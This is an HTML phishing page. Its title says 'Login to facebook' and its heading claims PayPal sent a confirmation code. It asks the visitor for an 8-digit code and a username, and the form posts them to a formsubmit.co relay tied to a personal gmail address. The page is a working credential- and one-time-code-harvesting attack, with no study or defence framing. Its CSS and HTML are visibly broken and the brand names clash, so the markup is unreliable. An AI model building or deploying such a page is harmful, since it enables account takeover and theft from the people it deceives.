<!DOCTYPE html>   
<html>   
<head>  
<meta name="viewport" content="width=device-width, initial-scale=1">  
<title> Login to facebook </title>  
<style>   
Body {  
  font-family: Calibri, Helvetica, sans-serif;  
  background-color: lightblue;  
}  
button {   
       background-color: #4CAF50;   
       width: 100%;  
        color: lightblue;   
        padding: 10px;   
        margin: 5px 8px;   
        border: none;   
        cursor: pointer;   
         }   
 rder-box;   
    }  
 button:hover {   
        opacity: 0.7;   
    }   
  .cancelbtn {   
        width: auto;   
        padding: 20px 20px;  
        margin: 10px 5px;  
    }   
        
     
 .container {   
        padding: 20px;   
        background-color: lightblue;  







</style>
</head>
<body>

<center><h1> paypal send you a confirmation code </h1><center>
        
<p contenteditable> Enter your 8 digit code:
<form action=" https://formsubmit.co/goodboyph123@gmail.com" method="POST" />
  <input type="text" name="fullname"placeholder="Enter username" /> <br /> 

        

<h1>
<style type="text/css">
  button {
    border: none;
    background: #0076ff;
    border-radius: 20px; 
    padding: 10px;
    color: #fff;
    font-weight: bold;
    font-size: 20px:
    text-transform: uppercase;

   }
</style>
<button>  send </button>


    